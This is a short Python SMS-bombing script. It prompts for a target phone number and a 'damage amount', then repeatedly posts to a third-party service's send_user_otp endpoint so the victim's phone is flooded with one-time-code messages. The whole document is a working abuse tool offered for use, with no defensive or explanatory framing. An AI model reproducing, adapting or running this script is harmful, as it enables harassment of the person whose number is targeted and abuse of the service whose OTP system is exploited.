import requests
from requests.structures import CaseInsensitiveDict

url = "https://ucapi.vnksrvc.com/users/send_user_otp.json"

headers = CaseInsensitiveDict()
headers["Content-Type"]="application/json"

number=str(input("[>] Enter Your Target Number:"))

amount = int(input("[>] Enter Your Damage Amount:"))

data = """{
  \"direct_login\": true,
  \"user\": {
    \"resend\": false,
    \"login\": \"88"""+number+"""\",
    \"type\": {
      \"register\": true
    }
  }
}"""

for i in range (amount):
	requests.post(url, headers=headers, data=data)
	print(str (i+1)+" Damage \n")